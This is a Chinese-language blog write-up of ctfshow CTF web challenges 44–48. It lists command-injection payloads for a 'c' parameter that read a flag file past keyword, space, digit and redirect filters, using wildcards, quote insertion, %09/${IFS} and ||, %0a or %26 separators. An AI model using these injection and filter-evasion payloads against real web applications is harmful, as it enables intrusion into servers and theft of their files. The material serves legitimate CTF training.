ctfshow web入门命令执行44-48

最新推荐文章于 2023-04-20 20:34:39 发布
最新推荐文章于 2023-04-20 20:34:39 发布
阅读量329 收藏
点赞数
分类专栏: ctfshow通关 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62207170/article/details/129822534
版权

目录

1.web44

2.web45 

3.web46

4.web47

5.web48

总结:

1.web44

过滤了flag,可以使用通配符绕过

 payload:

c=nl fla*||

c=nl fla*%26

c=nl fla*%26%26

c=nl fla*%0a

c=nl fla''g.php

2.web45 

又过滤了空格 ,最后一个为类似官方解法,为什么后面不能用fla*,因为会使$IFS空格失效

反引号的作用就是将反引号内的Linux命令先执行,然后将执行结果赋予变量(return函数),需要echo进行输出执行结果

payload:

c=nl%09fla*||

c=nl%09fla*||

c=nl%09fla*%26

c=nl%09fla*%26%26

c=nl%09fla*%0a

c=echo`nl${IFS}fla*`||

c=echo`nl\$IFS*`|| 

c=nl%09fla%3F%3F%3F%3F%3F||

c=nl%09fla''g.php

3.web46

这题过滤了空格和数字,$,*等

payload:

c=tac<>fla''g.php||

c=nl<fla''g.php%26

c=nl<fla''g.php%26%26     #%26可用是因为是特殊url编码,当执行时会自动转成&

c=nl<fla''g.php%0a

c=nl%09fla''g.php%0a

c=echo`nl<fla''g.php`%0a

c=nl%09fla%3F%3F%3F%3F%3F||

4.web47

 这题没过滤什么,只是把其他可以查看文件内容的命令过滤了

payload:

c=tac<>fla''g.php||

c=nl<fla''g.php%26

c=nl<fla''g.php%26%26     #%26可用是因为是特殊url编码,当执行时会自动转成&

c=nl<fla''g.php%0a

c=echo`nl<fla''g.php`%0a

c=nl%09<fla''g.php||

c=nl%09fla%3F%3F%3F%3F%3F||

5.web48

这题又过滤了一些命令,还有反引号 

payload:

c=nl%09fla%3F%3F%3F%3F%3F||     #%3F是? url编码

c=nl%09fla??????||                               #?和<不能同时使用

c=tac<>fla''g.php||

c=nl<fla''g.php%26

c=nl<fla''g.php%26%26     #%26可用是因为是特殊url编码,当执行时会自动转成&

c=nl<fla''g.php%0a

c=nl%09<fla''g.php||

总结:

flag被过滤了,主要又以下绕过方式

 fla\g.php

fla''g.php

fla*

fla??????

fla""g.php

 当执行系统命令时后面又>/dev/null 2>&1绕过方法

||

%0a

%26

%26%26

空格过滤绕过方式:

%09

${IFS}

\$IFS

burp fuzz测试%00-%0ff之间的字符

(14条消息) linux 里的`反引号_linux中反引号_cll_jj的博客-CSDN博客

(12条消息) [CTFSHOW]命令执行_ctfshow 命令执行_Y4tacker的博客-CSDN博客

mushangqiujin
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctfshow-VIP题目-Web-详细解题思路
01-27
CTFSHOW-VIP题目-Web-详细解题思路 本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制...
ctfshow-web41~60-WP
最新发布
02-21
ctfshow-web41~60-WPctfshow-web41~60-WP
CTFshow 命令执行 web44
Kradress的博客
11-19 71
目录源码一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 源码 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pa
ctfshow-web44(命令执行)
m0_62094846的博客
01-26 97
<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-05 21:32:01 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['c'])){ $c=$_GET['c'];..
Ctfshow web入门-web44 WP
qq_45427131的博客
05-18 137
web44 preg_match函数 多了对flag的过滤,flag可以用通配符绕过过滤 system函数还是一如既往的将传入参数的后面一个写入黑洞,不知道如何操作的小伙伴可以查看作者这两篇WP,都讲述了WP的具体用法 传送门1 传送门2 构造payload查看当前目录下的文件 http://cd9c951d-4ff3-4a90-ba3e-46bf02d00699.challenge.ctf.show:8080/?c=ls%26%26ls 有回显之后查看flag ...
Ctfshow web入门-web46
qq_45427131的博客
05-18 375
web46 查看源码,preg_match的过滤又增加了空格和$ 本来我们对于空格的绕过是${IFS}和%0a,不过preg_match过滤了美元符,用%09也可以绕过preg_match的过滤, 虽然对获取到的值有preg_match的过滤,但是preg_match不能过滤这种没有空格的命令,譬如ls,dir,whoami等等,首先执行,查看当前目录底下有哪些文件 构造payload: ?c=ls&&ls (&记得编码) 成功rce,接下来就是·获取flag,因为源码过滤
ctfshow web入门 {45-54}
weixin_58519918的博客
03-24 3690
Web(45) 空格过滤了这里的空格是ascll里的空格,我们可以用tab(%09)来通过 ?c=tac%09fla*||ls Web(46) a && b === if(a) { b },&&是同时必须满足的意思。a || b === if(!a) { b },||是或者的意思。 /?c=tac%09fla?.php%26%26ls 因为这是ascll码所以在转换时%09不会转换成0数字在30到39 . &&为%26%26 ASCLL
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
ctfshow web223-group盲注无数字
10-21
ctfshow web223-group盲注无数字
CTFshow 命令执行 web45
Kradress的博客
11-19 251
目录源码知识点题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-05 21:35:34 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['c'])){
ctfshow-web46(命令执行)
m0_62094846的博客
01-26 218
<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-05 21:50:19 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['c'])){ $c=$_GET['c'];..
ctfshow-web45(命令执行)
m0_62094846的博客
01-26 123
空格绕过 >` `<` `<>` 重定向符 `%09`(需要php环境) `${IFS}` `$IFS$9` `{cat,flag.php}` //用逗号实现了空格功能 `%20` `%09 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-
Ctfshow web入门-web45 WP
qq_45427131的博客
05-18 188
web45 关于黑洞的传送门 传送门1 传送门2 preg_match函数多了对空格的过滤 空格可以用${IFS}和%0a代替绕过过滤 常规的后面一个变量写入黑洞,直接构造payload: http://9e400eba-95d3-409c-b50a-451ff5a2d4a2.challenge.ctf.show:8080/?c=ls%26%26ls 用${IFS}代替空格,构造payload ...
ctfshow-web命令执行(web45-60)
m0_50268414的博客
11-29 2585
文章目录web45 &&等于; tab等于spaceweb46 过滤数字\*\$web47 <等于空格 ||解决黑洞web48 没什么软用web49 仍然没什么软用web50 过滤了%09%26web51 过滤了tacweb52 过滤了>和<web53 添加了回显web54 丧心病狂不让用''绕过web55 过滤了所有字母web56 过滤了所有字母2web57 \$(())web58 无回显web59 无回显2web60 无回显3 web45 &&等于; t
CTFshow web42 43 44 45 46 47
ChenD的学习笔记
11-09 749
CTFshow web42 web43 web44 web45 web46 web47
CTFshow web入门 web41~web55 命令执行
qq_56815564的博客
04-15 1345
这回是真正意义上的禁用了这些命令了,以前还能通过中间添加一些特殊符号来绕过的,现在是完全不能使用了,毕竟 . 后面跟上一个通配符后,就完全不能在中间加点什么了。简单分析一下,if中的语句第一个是输出GET传入的参数、第二个是执行c的语句后得到的东西赋值给d、第三个是换行后在输出d的内容。但是留下了一个一个或运算符( | )空格不能用可以使用tab键代替,url编码是%09,反正tab是最多是4个空格,多几个空格也不会怎样。说到底,这么多能有回显的函数,也不差cat这一个,形式有这么多,也不差分号这一个。
命令执行中关于PHP正则表达式的一些绕过方法
qq_45521281的博客
04-21 6977
最近做了buuctf上的[极客大挑战 2019]RCE ME,PHP正则的一些绕过方法也终于要用上了,原文地址:https://blog.csdn.net/mochu7777777/article/details/104631142 参考: https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html https://w...
ctfshow web入门---文件执行 解题思路
qq_73767109的博客
04-20 812
ctfshow web入门(web29-web59)解题思路与方法
ctfshow web入门命令执行
09-05
在CTF中,web入门命令执行指的是通过Web应用程序的漏洞,将恶意的命令注入到应用程序中并执行。这样的攻击可以导致未经授权的访问和操纵应用程序的数据和功能。 根据引用中提供的信息,可以看到一些常见的双写绕过技巧,如分号、竖线、双与号等。这些技巧可以用来绕过应用程序对输入参数的限制,从而注入恶意的命令。 引用中提到的payload,其中使用了一个通用的命令执行函数"show_source"来显示指定文件的源代码。这个payload可以用来尝试执行"flag.php"文件的源代码。但前提是要知道有一个名为"flag.php"的文件存在。 另外,引用中提供了另一种payload的示例,其中使用了array_reverse和scandir函数来获取文件目录并显示指定文件的源代码。同样,也可以直接使用show_source('flag.php')来显示"flag.php"文件的源代码。 需要注意的是,命令执行漏洞是非常危险的,因为它可以导致恶意用户执行任意的系统命令。为了保护Web应用程序免受此类攻击,开发人员应该对用户的输入进行严格的验证和过滤,并使用安全的编程实践来防止命令注入漏洞的发生。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [ctfshow web入门命令执行](https://blog.csdn.net/uuzfumo/article/details/128357863)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [CTFShow Web入门 命令执行](https://blog.csdn.net/qq_19533763/article/details/123910732)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值